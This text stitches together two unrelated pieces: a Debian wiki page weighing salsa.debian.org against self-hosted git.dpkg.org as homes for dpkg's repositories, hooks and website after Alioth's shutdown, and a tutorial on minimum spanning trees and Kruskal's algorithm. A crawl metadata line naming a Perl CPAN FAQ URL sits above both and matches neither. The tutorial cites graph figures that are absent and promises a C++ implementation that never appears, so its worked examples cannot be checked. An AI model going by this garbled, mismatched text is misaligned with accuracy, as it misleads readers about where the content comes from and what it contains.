| http://www.perl.com/pub/a/CPAN/misc/cpan-faq.html | crawl-002 | refinedweb | 2,665 | 69.99 |
Alioth is shutting down. Several of the services that dpkg uses need to be migrated elsewhere. This page covers what those are and the alternatives, with possible pros and cons.
Services used from Alioth
- git repos: anonscm.debian.org
- hook: debbugs tagpending
- git.dpkg.org: git-tag-pending hook.
- salsa.d.o: webhook available.
- hook: commit email notifications
- git.dpkg.org: git-multimail hook.
salsa.d.o: support email notifications but it sends all commits in a single mail, and this is apparently not going to be fixed in salsa. Upstream bug.
- hook: IRC notifications
- git.dpkg.org: kgb-client hook.
salsa.d.o: support for KGB (, but it uses URL shorteners 900706) or irker instances.
- hook: CI trigger
- git.dpkg.org: grml-jenkins trigger hook.
- salsa.d.o: runners now available.
- salsa.d.o: there are a couple of plugins for jenkins and gitlab.
- group commit rights (although might want to consider settting up the repos in a different way to avoid push+release clashes)
- git.dpkg.org: a couple of push only SSH accounts can be easily created.
- salsa.d.o: supported by default.
- static website: → dpkg.alioth.debian.org
- git stats
-: gitstats trigger hook.
- salsa.d.o: can be replaced with the built-in support.
- historic VCS and release tarballs
-: easy hosting of the few files, TLS support.
- salsa.d.o: pages support, not sure whether it's a good fit for biggish content. Does not look likely.
- libdpkg doxygen generated docs
-: trigger hook.
- salsa.d.o: pages support, could be generated manually (like now) or could be triggered as part of some CI/CD setup.
- code coverage reports
-: trigger hook.
- salsa.d.o: pages support, could be generated manually (like now) or could be triggered as part of some CI/CD setup.
Alternatives
salsa.debian.org
This is the natural successor. Although it currently poses some problems, many are probably fixable, others are minor paper-cuts.
Cons:
- URL-change-fatigue and service-tied URL. Ideally the URL should be service neutral, like the previous anonscm.d.o.
- there's now a redirector in place, but it specifies the redirection as permanent, which makes git emit warnings, and it states it should be immediately reverted once the repos have been migrated.
- some of the webhooks are currently suboptimal or plain broken.
- single notification mail for all commits.
- KGB uses shortened URLs.
- gitlab seems to have a somewhat broken web notification system (paper-cut).
- the current setup makes everyone be a member of the collective debian group which means every and each project there is your own, and there's no obvious way to pin specific repos.
- namespaces is already a mess.
Pros:
- "obvious" migration path, supported by Debian.
- out-of-the-box groups/users/maintenance.
- provides very interesting features: merge requests, built-in CI, etc.
- pages support.
(git|www).dpkg.org
Cons:
- self-hosted (DSA do not seem happy to host any of this themselves).
- possibly annoying or no user-management, but it should really require just a couple of accounts in any case.
Pros:
- way more stable URLs, and can host redirectors in "perpetuity".
- can automatically push to the various hosting instances easily with access tokens or similar (salsa, github, etc).
- can easily host the web site.
- can easily trigger CI/CD on the same system.
- can use whatever hooks we want (including non-limited KGB or broken email notifications).
dpkg.debian.net
Similar Cons and Pros to using dpkg.org. And in addition:
Cons:
way way worse URLs, no distinction between www and git URLs.
Pros:
- does not require approval from anyone.
- even if we get better URLs later on, they can be cheaply redirected in "perpetuity". | https://wiki.debian.org/Teams/Dpkg/AliothEscape | CC-MAIN-2019-22 | refinedweb | 612 | 52.87 |
Is there a way that I can import information from my Outlook calendar into an Access table?
To import your data, you'll first need to build a table to hold the information. Table 7-2 lists the fields associated with Outlook's calendar appointments that you'll need to include in your table.
Table 7-2. Fields in the Outlook calendar table
Next, you'll need to add a reference to the Outlook Object Library (see Figure 7-2adding_the_outlook_object_library_to_your_application). To display the References dialog, choose Tools → References from the Visual Basic Editor's main menu.
Figure 7-20. Adding the Outlook Object Library to your application
Finally, here is a routine that will do the work. It begins by declaring a bunch of variables needed to access Outlook's data, plus an ADO
Recordset object that will be used to save the information into Access:
Sub Example7_15() Dim Outlook As Outlook.Application Dim namespace As Outlook.namespace Dim root As Outlook.MAPIFolder Dim cal As Outlook.MAPIFolder Dim item As Object Dim appt AsOutlook.AppointmentItem Dim rs As ADODB.Recordset Set Outlook = New Outlook.Application ...
No credit card required | https://www.safaribooksonline.com/library/view/access-data-analysis/0596101228/ch07s15.html | CC-MAIN-2018-30 | refinedweb | 190 | 50.43 |
Program for Row wise sorting of Matrix
In this tutorial, we will learn about the Program for Row wise sorting of Matrix in C++. Firstly we will learn about matrix and its insertion. Then sort the matrix row-wise.
Introduction
Matrix is a rectangular array of numbers that are arranged in the form of rows and columns. The total number of elements in a matrix is product between the number of rows and number of columns. To sort the matrix we have to sort every single row one row at a time.
Before sorting we have to get the data from input. To get the data we will use two loops one inner and one outer loop.
Demonstration:
#include<iostream> using namespace std; int main(){ int matrix[10][10]; cout<<"Enter the data : "<<endl; for(int i=0;i<2;i++){ for(int j=0;j<2;j++){ cin>>matrix[i][j]; } } ] cout<<endl; for(int i=0;i<2;i++){ for(int j=0;j<2;j++){ cout<<matrix[i][j]<<" "; } cout<<endl; } return 0; }
In the above code, we use two loops one to change the rows and one to change columns.
Program for row-wise sorting of matrix in C++
Code:
#include <bits/stdc++.h> using namespace std; #define SIZE 10 void sort(int mat[SIZE][SIZE], int n) { int temp[n * n]; int k = 0; for (int i = 0; i < n; i++) for (int j = 0; j < n; j++) temp[k++] = mat[i][j]; sort(temp, temp + k); k = 0; for (int i = 0; i < n; i++) for (int j = 0; j < n; j++) mat[i][j] = temp[k++]; } void print(int mat[SIZE][SIZE], int n) { for (int i = 0; i < n; i++) { for (int j = 0; j < n; j++) cout << mat[i][j] << " "; cout << endl; } } int main() { int mat[SIZE][SIZE] ; int n; cout<<"Enter the dimension of matrix : "; cin>>n; for(int i=0;i<n;i++){ for(int j=0;j<n;j++){ cin>>mat[i][j]; } } cout << "Original Matrix:\n"; print(mat, n); sort(mat, n); cout << "\nMatrix After Sorting:\n"; print(mat, n); return 0; }
Input and Output:
Enter the dimension of matrix : 2 2 3 6 1 Original Matrix: 2 3 6 1 Matrix After Sorting: 1 2 3 6
Explanation:
Firstly we take input of the data.
Secondly, we call sort function. Sort function takes arguments matrix and dimension. An array is created with size of matrix then it is filled with the data of matrix. Then it is sorted like an ordinary array. After sorting it is inserted back to the matrix.
Therefore the matrix is sorted.
Conclusion
This was the program for row-wise sorting of the matrix. We can also use the same method for the sorting of one-dimensional array.
Also See: | https://www.codespeedy.com/cpp-program-for-row-wise-sorting-of-matrix/ | CC-MAIN-2020-40 | refinedweb | 468 | 67.49 |
Esta traducción está incompleta. Por favor, ayuda a traducir este artículo del inglés.os. Como parte de esta demostración extenderemos el sitio web de la Biblioteca Local de manera que los bibliotecarios puedan renovar libros, y crear, actualizar y borrar autores usando sus propios formularios (en vez de usar la aplicación de administración).
Revision
Una Forma HTML es un conjunto de uno o mas campos/widgets en una pagina web, que pueden ser usados para recaudar informacion de los usuarios para enviarla al servidor. Las formas son un mecanismo flexible para collecting user input because there are suitable widgets for entering many different types of data, including text boxes, checkboxes, radio buttons, date pickers, etc. Forms are also a relatively secure way of sharing data with the server, as they allow us to send data in
POST requests with cross-site request forgery protection.
While we haven't created any forms in this tutorial so far, we've already encountered them in the Django Admin site — for example the screenshot below shows a form for editing one of our Book models, comprised of a number of selection lists and text editors.
Working with forms can be complicated! Developers need to write HTML for the form, validate and properly sanitise entered data on the server (and possibly also in the browser), repost the form with error messages to inform users of any invalid fields, handle the data when it has successfully been submitted, and finally respond to the user in some way to indicate success. Django Forms take a lot of the work out of all these steps, by providing a framework that lets you define forms and their fields programmatically, and then use these objects to both generate the form HTML code and handle much of the validation and user interaction.
In this tutorial we're going to show you a few of the ways you can create and work with forms, and in particular, how the generic editing form views can significantly reduce the amount of work you need to do to create forms to manipulate your models. Along the way we'll extend our LocalLibrary application by adding a form to allow librarians to renew library books, and we'll create pages to create, edit and delete books and authors (reproducing a basic version of the form shown above for editing books).
HTML Forms
First a brief overview of HTML Forms. Consider a simple HTML form, with a single text field for entering the name of some "team", and its associated label:
just have one text field for entering the team name, a form may have) that can be pressed by the user to upload the data in all the other input elements in the form.
The role of the server is first to render the initial form state — either containing blank fields, or pre-populated with initial values. After the user presses the submit button the server will receive the form data with values from the web browser, and must validate the information. If the form contains invalid data the server should display the form again, this time with user-entered data in "valid" fields, and messages to describe the problem for the invalid fields. Once the server gets a request with all valid form data it can perform an appropriate action (e.g. saving the data, returning the result of a search, uploading a file etc.) and then notify the user.
As you can imagine, creating the HTML, validating the returned data, re-displaying the entered data with error reports if needed, and performing the desired operation on valid data can all take quite a lot of effort to "get right". Django makes this a lot easier, by taking away some of the heavy lifting and repetitive code!
Django form handling data to be displayed). What makes things more complicated is that the server also needs to be able to process data provided by the user, and redisplay the page if there are any errors.
A process flowchart of how Django handles form requests is shown below, starting with a request for a page containing a form (shown in green).
Based on the diagram above, the main things that Django's form handling does).
- The form is referred to as unbound at this point, because it isn't associated with any user-entered data (though it may have initial values).
- Receive data from a submit request and bind it to the form.
- Binding data to the form means that the user-entered data and any errors are available when we need to redisplay the form.
- Clean and validate the data.
- Cleaning the data performs sanitisation of the input (e.g. removing invalid characters that might potentially used to send malicious content to the server) and converts them into consistent Python types.
- Validation checks that the values are appropriate for the field (e.g. are in the right date range, aren't too short or too long, etc.)
- If any data is invalid, re-display the form, this time with any user populated values and error messages for the problem fields.
- If all data is valid, perform required actions (e.g. save the data, send and email, return the result of a search, upload a file etc.)
- Once all actions are complete, redirect the user to another page.
Django provides a number of tools and approaches to help you with the tasks detailed above. The most fundamental is the
Form class, which simplifies both generation of form HTML and data cleaning/validation. In the next section we describe how forms work using the practical example of a page to allow librarians to renew books.
Note: Understanding how
Form is used will help you when we discuss Django's more "high level" form framework classes.
Renew-book form using a Form and function view
Next we're going to add a page to allow librarians to renew borrowed books. To do this we'll create a form that allows users to enter a date value. We'll seed the field with an initial value 3 weeks from the current date (the normal borrowing period), and add some validation to ensure that the librarian can't enter a date in the past or a date too far in the future. When a valid date has been entered, we'll write it to the current record's
BookInstance.due_back field.
The example will use a function-based view and a
Form class. The following sections explain how forms work, and the changes you need to make to our ongoing LocalLibrary project.
Form
The
Form class is the heart of Django's form handling system. It specifies the fields in the form, their layout, display widgets, labels, initial values, valid values, and (once validated) the error messages associated with invalid fields. The class also provides methods for rendering itself in templates using predefined formats (tables, lists, etc.) or for getting the value of any element (enabling fine-grained manual rendering).
Declaring a Form
The declaration syntax for a
Form is very similar to that for declaring a
Model, and shares the same field types (and some similar parameters). This makes sense because in both cases we need to ensure that each field handles the right types of data, is constrained to valid data, and has a description for display/documentation.
To create a
Form we import the
forms library, derive from the
Form class, and declare the form's fields. A very basic form class for our library book renewal form is shown below:
from django import forms class RenewBookForm(forms.Form): renewal_date = forms.DateField(help_text="Enter a date between now and 4 weeks (default 3).")
Form fields
In this case we have a single
DateField for entering the renewal date that will render in HTML with a blank value, the default label "Renewal date:", and some helpful usage text: "Enter a date between now and 4 weeks (default 3 weeks)." As none of the other optional arguments are specified the field will accept dates using the input_formats: YYYY-MM-DD (2016-11-06), MM/DD/YYYY (02/26/2016), MM/DD/YY (10/25/16), and will be rendered using the default widget: DateInput.
There are many other types of form fields, which you will largely recognise from their similarity to the equivalent model field classes:
BooleanField,
CharField,
ChoiceField,
TypedChoiceField,
DateField,
DateTimeField,
DecimalField,
DurationField,
FileField,
FilePathField,
FloatField,
ImageField,
IntegerField,
GenericIPAddressField,
MultipleChoiceField,
TypedMultipleChoiceField,
NullBooleanField,
RegexField,
SlugField,
TimeField,
URLField,
UUIDField,
ComboField,
MultiValueField,
SplitDateTimeField,
ModelMultipleChoiceField,
ModelChoiceField.
The arguments that are common to most fields are listed below (these have sensible default values):
- required: If
True, the field may not be left blank or given a
Nonevalue. Fields are required by default, so you would set
required=Falseto allow blank values in the form.
- label: The label to use when rendering the field in HTML. If label is not specified then Django would create one from the field name by capitalising the first letter and replacing underscores with spaces (e.g. Renewal date).
- label_suffix: By default a colon is displayed after the label (e.g. Renewal date:). This argument allows you to specify as different suffix containing other character(s).
- initial: The initial value for the field when the form is displayed.
- widget: The display widget to use.
- help_text (as seen in the example above): Additional text that can be displayed in forms to explain how to use the field.
- error_messages: A list of error messages for the field. You can override these with your own messages if needed.
- validators: A list of functions that will be called on the field when it is validated.
- localize: Enables the localisation of form data input (see link for more information).
- disabled: The field is displayed but its value cannot be edited if this is
True. The default is
False.
Validation
Django provides numerous places where you can validate your data. The easiest way to validate a single field is to override the method
clean_<fieldname>() for the field you want to check. So for example, we can validate that entered
renewal_date values are between now and 4 weeks by implementing
clean_renewal_date() as shown below.
from django import forms from django.core.exceptions import ValidationError from django.utils.translation import ugettext_lazy as _ import datetime #for checking renewal date range. class RenewBookForm(forms.Form): renewal_date = forms.DateField(help_text="Enter a date between now and 4 weeks (default 3).") def clean_renewal_date(self): data = self.cleaned_data['renewal_date']
There are two important things to note. The first is that we get our data using
self.cleaned_data['renewal_date'] and that we return this data whether or not we change it at the end of the function. This step gets us the data "cleaned" and sanitised of potentially unsafe input using the default validators, and converted into the correct standard type for the data (in this case a Python
datetime.datetime object).
The second point is that if a value falls outside our range we raise a
ValidationError, specifying the error text that we want to display in the form if an invalid value is entered. The example above also wraps this text in one of Django's translation functions
ugettext_lazy() (imported as
_()), which is good practice if you want to translate your site later.
Note: There are numerious other methods and examples for validating forms in Form and field validation (Django docs). For example, in cases where you have multiple fields that depend on each other, you can override the Form.clean() function and again raise a
ValidationError.
That's all we need for the form in this example!
Copy the Form
Create and open the file locallibrary/catalog/forms.py and copy the entire code listing from the previous block into it.
URL Configuration
Before we create our view, let's add a URL configuration for the renew-books page. Copy the following configuration to the bottom of locallibrary/catalog/urls.py.
urlpatterns += [ url(r'^book/(?P<pk>[-\w]+)/renew/$', views.renew_book_librarian, name='renew-book-librarian'), ]
The URL configuration will redirect URLs with the format /catalog/book/<bookinstance id>/renew/ to the function named
renew_book_librarian() in views.py, and send the
BookInstance id as the parameter named
pk.
Note: We can name our captured URL data "pk" anything we like, because we have complete control over the view function (we're not using a generic detail view class that expects parameters with a certain name). However
pk, short for "primary key", is a reasonable convention to use!
View
As discussed in the Django form handling process above, the view has to render the default form when it is first called and then either re-render it with error messages if the data is invalid, or process the data and redirect to a new page if the data is valid. In order to perform these different actions, the view has to be able to know whether it is being called for the first time to render the default form, or a subsequent time to validate data.
For forms that use a
POST request to submit information to the server, the most common pattern is for the view to test against the
POST request type (
if request.method == 'POST':) to identify form validation requests and
GET (using an
else condition) to identify the initial form creation request. If you want to submit your data using a
GET request then a typical approach for identifying whether this is the first or subsequent view invocation is to read the form data (e.g. to read a hidden value in the form).
The book renewal process will be writing to our database, so by convention we use the
POST request approach. The code fragment below shows the (very standard) pattern for this sort of function view.
from django.shortcuts import get_object_or_404 from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse import datetime from .forms import RenewBookForm def renew_book_librarian(request, pk):})
First we import our form (
RenewBookForm) and a number of other useful objects/methods used in the body of the view function:
get_object_or_404(): Returns a specified object from a model based on its primary key value, and raises an
Http404exception (not found) if the record does not exist.
HttpResponseRedirect: This creates a redirect to a specified URL (HTTP status code 302).
reverse(): This generates a URL from a URL configuration name and a set of arguments. It is the Python equivalent of the
urltag that we've been using in our templates.
datetime: A Python library for manipulating dates and times.
In the view we first use the
pk argument in
get_object_or_404() to get the current
BookInstance (if this does not exist, the view will immediately exit and the page will display a "not found" error). If this is not a
POST request (handled by the
else clause) then we create the default form passing in an
initial value for the
renewal_date field (as shown in bold below, this is 3 weeks from the current date).
book_inst=get_object_or_404(BookInstance, pk = pk) #})
After creating the form, we call
render() to create the HTML page, specifying the template and a context that contains our form. In this case the context also contains our
BookInstance, which we'll use in the template to provide information about the book we're renewing.
If however this is a
POST request, then we create our
form object and populate it with data from the request. This process is called "binding" and allows us to validate the form. We then check if the form is valid, which runs all the validation code on all of the fields — including both the generic code to check that our date field is actually a valid date and our specific form's
clean_renewal_date() function to check the date is in the right range.') ) return render(request, 'catalog/book_renew_librarian.html', {'form': form, 'bookinst':book_inst})
If the form is not valid we call
render() again, but this time the form value passed in the context will include error messages.
If the form is valid, then we can start to use the data, accessing it through the
form.cleaned_data attribute (e.g.
data = form.cleaned_data['renewal_date']). Here we just save the data into the
due_back value of the associated
BookInstance object.
Important: While you can also access the form data directly through the request (for example
request.POST['renewal_date'] or
request.GET['renewal_date'] (if using a GET request) this is NOT recommended. The cleaned data is sanitised, validated, and converted into Python-friendly types. '/').
That's everything needed for the form handling itself, but we still need to restrict access to the view to librarians. We should probably create a new permission in
BookInstance ("
can_renew"), but to keep things simple here we just use the
@permission_required function decorator with our existing
can_mark_returned permission.
The final view is therefore as shown below. Please copy this into the bottom of locallibrary/catalog/views.py.
from django.contrib.auth.decorators import permission_required from django.shortcuts import get_object_or_404 from django.http import HttpResponseRedirect from django.core.urlresolvers import reverse import datetime from .forms import RenewBookForm @permission_required('catalog.
can_mark_returned') def renew_book_librarian(request, pk): """ View function for renewing a specific BookInstance by librarian """})
The template
Create the template referenced in the view (/catalog/templates/catalog/book_renew_librarian.html) and copy the code below into it:
{% extends "base_generic.html" %} {% block content %} <h1>Renew: {{bookinst.book.title}}</h1> <p>Borrower: {{bookinst.borrower}}</p> <p{% if bookinst.is_overdue %} {% csrf_token %} <table> {{ form }} </table> <input type="submit" value="Submit" /> </form> {% endblock %}
Most of this will be completely familiar from previous tutorials. We extend the base template and then redefine the content block. We are able to reference
{{bookinst}} (and its variables) because it was passed into the context object in the
render() function, and we use these to list the book title, borrower and the original due date.
The form code is relatively simple. First we declare the
form tags, specifying where the form is to be submitted (
action) and the
method for submitting the data (in this case an "HTTP POST") — if you recall the HTML Forms overview at the top of the page, an empty
action as shown, means that the form data will be posted back to the current URL of the page (which is what we want!). Inside the tags we define the
submit input, which a user can press to submit the data. The
{% csrf_token %} added just inside the form tags is part of Django's cross-site forgery protection.
Note: Add the
{% csrf_token %} to every Django template you create that uses
POST to submit data. This will reduce the chance of forms being hijacked by malicious users.
All that's left is the
{{form}} template variable, which we passed to the template in the context dictionary. Perhaps unsurprisingly, when used as shown this provides the default rendering of all the form fields, including their labels, widgets, and help text — the rendering is as shown below:
<tr> <th><label for="id_renewal_date">Renewal date:</label></th> <td> <input id="id_renewal_date" name="renewal_date" type="text" value="2016-11-08" required /> <br /> <span class="helptext">Enter date between now and 4 weeks (default 3 weeks).</span> </td> </tr>
Note: It is perhaps not obvious because we only have one field, but by default every field is defined in its own table row (which is why the variable is inside
table tags above). This same rendering is provided if you reference the template variable
{{ form.as_table }}.
If you were to enter an invalid date, you'd additionally get a list of the errors rendered in the page (shown in bold below).
<tr> <th><label for="id_renewal_date">Renewal date:</label></th> <td> <ul class="errorlist"> <li>Invalid date - renewal in past</li> </ul> <input id="id_renewal_date" name="renewal_date" type="text" value="2015-11-08" required /> <br /> <span class="helptext">Enter date between now and 4 weeks (default 3 weeks).</span> </td> </tr>
Other ways of using form template variable
Using
{{form}} as shown above, each field is rendered as a table row. You can also render each field as a list item (using
{{form.as_ul}} ) or as a paragraph (using
{{form.as_p}}).
What is even more cool is that you can have complete control over the rendering of each part of the form, by indexing its properties using dot notation. So for example we can access a number of separate items for our
renewal_date field:
{{form.renewal_date}}:The whole field.
{{form.renewal_date.errors}}: The list of errors.
{{form.renewal_date.id_for_label}}: The id of the label.
{{form.renewal_date.help_text}}: The field help text.
- etc!
For more examples of how to manually render forms in templates and dynamically loop over template fields, see Working with forms > Rendering fields manually (Django docs).
Testing the page
If you accepted the "challenge" in Django Tutorial Part 8: User authentication and permissions you'll have a list of all books on loan in the library, which is only visible to library staff. We can add a link to our renew page next to each item using the template code below.
{% if perms.catalog.can_mark_returned %}- <a href="{% url 'renew-book-librarian' bookinst.id %}">Renew</a> {% endif %}
Note: Remember that your test login will need to have the permission "
catalog.can_mark_returned" in order to access the renew book page (perhaps use your superuser account).
You can alternatively manually construct a test URL like this —<bookinstance_id>/renew/ (a valid bookinstance id can be obtained by navigating to a book detail page in your library, and copying the
id field).
What does it look like?
If you are successful, the default form will look like this:
The form with an invalid value entered, will look like this:
The list of all books with renew links will look like this:
ModelForms
Creating a
Form class using the approach described above is very flexible, allowing you to create whatever sort of form page you like and associate it with any model or models.
However if you just need a form to map the fields of a single model then your model will already define most of the information that you need in your form: fields, labels, help text, etc. Rather than recreating the model definitions in your form, it is easier to use the ModelForm helper class to create the form from your model. This
ModelForm can then be used within your views in exactly the same way as an ordinary
Form.
A basic
ModelForm containing the same field as our original
RenewBookForm is shown below. All you need to do to create the form is add
class Meta with the associated
model (
BookInstance) and a list of the model
fields to include in the form (you can include all fields using
fields = '__all__', or you can use
exclude (instead of
fields) to specify the fields not to include from the model).
from django.forms import ModelForm from .models import BookInstance class RenewBookModelForm(ModelForm): class Meta: model = BookInstance fields = ['due_back',]
Note: This might not look like all that much simpler than just using a
Form (and it isn't in this case, because we just have one field). However if you have a lot of fields, it can reduce the amount of code quite significantly!
The rest of the information comes from the model field definitions (e.g. labels, widgets, help text, error messages). If these aren't quite right, then we can override them in our
class Meta, specifying a dictionary containing the field to change and its new value. For example, in this form we might want a label for our field of "Renewal date" (rather than the default based on the field name: Due date), and we also want our help text to be specific to this use case. The
Meta below shows you how to override these fields, and you can similarly set
widgets and
error_messages if the defaults aren't sufficient.
class Meta: model = BookInstance fields = ['due_back',] labels = { 'due_back': _('Renewal date'), } help_texts = { 'due_back': _('Enter a date between now and 4 weeks (default 3).'), }
To add validation you can use the same approach as for a normal
Form — you define a function named
clean_field_name() and raise
ValidationError exceptions for invalid values. The only difference with respect to our original form is that the model field is named
due_back and not "
renewal_date".
from django.forms import ModelForm from .models import BookInstance class RenewBookModelForm(ModelForm): def clean_due_back(self): data = self.cleaned_data['due_back'] class Meta: model = BookInstance fields = ['due_back',] labels = { 'due_back': _('Renewal date'), } help_texts = { 'due_back': _('Enter a date between now and 4 weeks (default 3).'), }
The class
RenewBookModelForm below is now functionally equivalent to our original
RenewBookForm. You could import and use it wherever you currently use
RenewBookForm.
Generic editing views
The form handling algorithm we used in our function view example above represents an extremely common pattern in form editing views. Django abstracts much of this "boilerplate" for you, by creating generic editing views for creating, editing, and deleting views based on models. Not only do these handle the "view" behaviour, but they automatically create the form class (a
ModelForm) for you from the model.
Note: In addition to the editing views described here, there is also a FormView class, which lies somewhere between our function view and the other generic views in terms of "flexibility" vs "coding effort". Using
FormView you still need to create your
Form, but you don't have to implement all of the standard form-handling pattern. Instead you just have to provide an implementation of the function that will be called once the submitted is known to be be valid.
In this section we're going to use generic editing views to create pages to add functionality to create, edit, and delete
Author records from our library — effectively providing a basic reimplementation of parts of the Admin site (this could be useful if you need to offer admin functionality in a more flexible way that can be provided by the admin site).
Views
Open the views file (locallibrary/catalog/views.py) and append the following code block to the bottom of it:
from django.views.generic.edit import CreateView, UpdateView, DeleteView from django.urls import reverse_lazy from .models import Author class AuthorCreate(CreateView): model = Author fields = '__all__' initial={'date_of_death':'05/01/2018',} class AuthorUpdate(UpdateView): model = Author fields = ['first_name','last_name','date_of_birth','date_of_death'] class AuthorDelete(DeleteView): model = Author success_url = reverse_lazy('authors')
As you can see, to create the views you need to derive from
CreateView,
UpdateView, and
DeleteView (respectively) and then define the associated model.
For the "create" and "update" cases you also need to specify the fields to display in the form (using in same syntax as for
ModelForm). In this case we show both the syntax to display "all" fields, and how you can list them individually. You can also specify initial values for each of the fields using a dictionary of field_name/value pairs (here we arbitrarily set the date of death for demonstration purposes — you might want to remove that!). By default these views will redirect on success to a page displaying the newly created/edited model item, which in our case will be the author detail view we created in a previous tutorial. You can specify an alternative redirect location by explicitly declaring parameter
success_url (as done for the
AuthorDelete class).
The
AuthorDelete class doesn't need to display any of the fields, so these don't need to be specified. You do however need to specify the
success_url, because there is no obvious default value for Django to use. In this case we use the
reverse_lazy() function to redirect to our author list after an author has been deleted —
reverse_lazy() is a lazily executed version of
reverse(), used here because we're providing a URL to a class-based view attribute.
Templates
The "create" and "update" views use the same template by default, which will be named after your model: model_name_form.html (you can change the suffix to something other than _form using the
template_name_suffix field in your view, e.g.
template_name_suffix = '_other_suffix')
Create the template file locallibrary/catalog/templates/catalog/author_form.html and copy in the text below.
{% extends "base_generic.html" %} {% block content %} <form action="" method="post"> {% csrf_token %} <table> {{ form.as_table }} </table> <input type="submit" value="Submit" /> </form> {% endblock %}
This is similar to our previous forms, and renders the fields using a table. Note also how again we declare the
{% csrf_token %} to ensure that our forms are resistant to CSRF attacks.
The "delete" view expects to find a template named with the format model_name_confirm_delete.html (again, you can change the suffix using
template_name_suffix in your view). Create the template file locallibrary/catalog/templates/catalog/author_confirm_delete.html and copy in the text below.
{% extends "base_generic.html" %} {% block content %} <h1>Delete Author</h1> <p>Are you sure you want to delete the author: {{ author }}?</p> <form action="" method="POST"> {% csrf_token %} <input type="submit" action="" value="Yes, delete." /> </form> {% endblock %}
URL configurations
Open your URL configuration file (locallibrary/catalog/urls.py) and add the following configuration to the bottom of the file:
urlpatterns += [ url(r'^author/create/$', views.AuthorCreate.as_view(), name='author_create'), url(r'^author/(?P<pk>\d+)/update/$', views.AuthorUpdate.as_view(), name='author_update'), url(r'^author/(?P<pk>\d+)/delete/$', views.AuthorDelete.as_view(), name='author_delete'), ]
There is nothing particularly new here! You can see that the views are classes, and must hence be called via
.as_view(), and you should be able to recognise the URL patterns in each case. We must use
pk as the name for our captured primary key value, as this is the parameter name expected by the view classes.
The author create, update, and delete pages are now ready to test (we won't bother hooking them into the site sidebar in this case, although you can do so if you wish).
Note: Observant users will have noticed that we didn't do anything to prevent unauthorised users from accessing the pages! We leave that as an exercise for you (hint: you could use the
PermissionRequiredMixin and either create a new permission or reuse our
can_mark_returned permission).
Testing the page
First login to the site with an account that has whatever permissions you decided are needed to access the author editing pages.
Then navigate to the author create page:, which should look like the screenshot below.
Enter values for the fields and then press Submit to save the author record. You should now be taken to a detail view for your new author, with a URL of something like.
You can test editing records by appending /update/ to the end of the detail view URL (e.g.) — we don't show a screenshot, because it looks just like the "create" page!
Last of all we can delete the page, by appending delete to the end of the author detail-view URL (e.g.). Django should display the delete page shown below. Press Yes, delete. to remove the record and be taken to the list of all authors.
Challenge yourself
Create some forms to create, edit and delete
Book records. You can use exactly the same structure as for
Authors. If your book_form.html template is just a copy-renamed version of the author_form.html template, then the new "create book" page will look like the screenshot below:
Summary
Creating and handling forms can be a complicated process! Django makes it much easier by providing programmatic mechanisms to declare, render and validate forms. Furthermore, Django provides generic form editing views that can do almost all the work to define pages that can create, edit, and delete records associated with a single model instance.
There is a lot more that can be done with forms (check out our See also list below), but you should now understand how to add basic forms and form-handling code to your own websites.
See also
- Working with forms (Django docs)
- Writing your first Django app, part 4 > Writing a simple form (Django docs)
- The Forms API (Django docs)
- Form fields (Django docs)
- Form and field validation (Django docs)
- Form handling with class-based views (Django docs)
- Creating forms from models (Django docs)
- Generic editing views (Django docs)
En este módulo
- Introducción a Django
- Configurando un entorno de desarrollo Django
- Tutorial de Django: El sito web de la Biblioteca Local
- Tutorial de Django Parte 2: Creando el esqueleto de un sitio web
- Tutorial de Django Parte 3: Usando modelos
- Tutorial de Django Parte 4: Sitio de administración de Django
- Tutorial de Django Parte 5: Creando nuestra página de inicio
- Tutorial de Django Parte 6: Listas genéricas y vistas de detalle
- Tutorial de Django Parte 7: Framework de sesiones
- Tutorial de Django Parte 8: Autenticación de usuarios y permisos
- Tutorial de Django Parte 9: Trabajando con formularios
- Tutorial de Django Parte 10: Probando una aplicación web de Django
- Tutorial de Django Parte 11: Poniendo Django en producción
- Seguridad en aplicaciones web Django
- DIY Django mini blog | https://developer.mozilla.org/es/docs/Learn/Server-side/Django/Forms | CC-MAIN-2018-34 | refinedweb | 5,489 | 51.68 |
In this article, we would mainly be discussing the formation of a minimum spanning tree as well as the utilization of Kruskal’s algorithm for getting the minimum spanning tree of a graph. We would also be providing an implementation of Kruskal’s algorithm in C++ to help brush up on your concepts.
What is Kruskal’s Algorithm?
Graphs might just be one of the most difficult areas of programming to approach as a beginner. This is primarily because questions of data structures and algorithms in graphs are not very clear about how to proceed with a solution. It is only through rigorous practice that one can improve their knowledge of the algorithm. As it happens, one of the most popular algorithms used with graphs is the ones for traversing the graph in the minimum time possible as well as the ones which produce a minimum spanning tree from it. For graph traversal, we have the BFS and DFS algorithms, while the equivalent minimum spanning tree can be produced with the help of Prim’s algorithm or Kruskal’s algorithm.
These are some of the easiest algorithms which one can learn while they use graphs to solve problems. Minimum spanning trees help reduce the number of edges to a large extent so that only the minimal edges are shown. This, in turn, finds application in solving a variety of questions that can be solved using graphs. (The real difficulty for any beginner is to understand that graphs can be used to find a solution for a problem and how to manipulate the vertices and edges to their advantage.)
What is a Minimum spanning tree?
The main objective of using Kruskal’s algorithm is for getting the minimum cost spanning tree for a graph. However, this makes no sense if you don’t understand what a minimum spanning tree exactly is. This can be the best explaining with an example.
Let us suppose we have a graph like this:
We have four nodes, A, B, C, and D. We can rearrange the various edges of the graph to remove cycles and form a tree. This can be done in several ways:-
In this case, the weight of the tree is 22+21+13=56.
In this case, the weight of the tree is 10+22+21=53.
In this case, the weight of the tree is 10+18+13=41. On carefully comparing, we might see that this tree has the minimum weight amongst all of the trees obtained. The main objective for Prim’s algorithm or Kruskal’s algorithm is to obtain this minimum spanning tree. A tree obtained from a graph such that the sum of the weights of the edges is minimum is called a minimum spanning tree.
How Kruskal algorithm Works
The algorithm starts with V different groups (where V is the number of vertices in a graph). At every step of the process, the edge with the minimum weight of the graph is chosen and added to the minimum spanning tree. An edge is only chosen in such a way if it does not create a cycle – if the edge with the minimum weight causes a cycle in the minimum spanning tree, the algorithm proceeds with the edge with the second minimum weight. Adding an edge to the graph also merges both of the vertices making it into one group (remember that each of the vertices starts in separate groups initially). When the algorithm is finished, only one group is left which represents the minimum spanning tree.
C++ Kruskal’s algorithm works in a slightly different manner than Prim’s algorithm. Prim’s algorithm pushes vertices to this group and expands it one by one starting from the two vertices which form the edge with the minimum weight. Kruskal’s algorithm is more concerned with the edges rather than the vertices and deals with edges directly by adding their vertices to a common group.
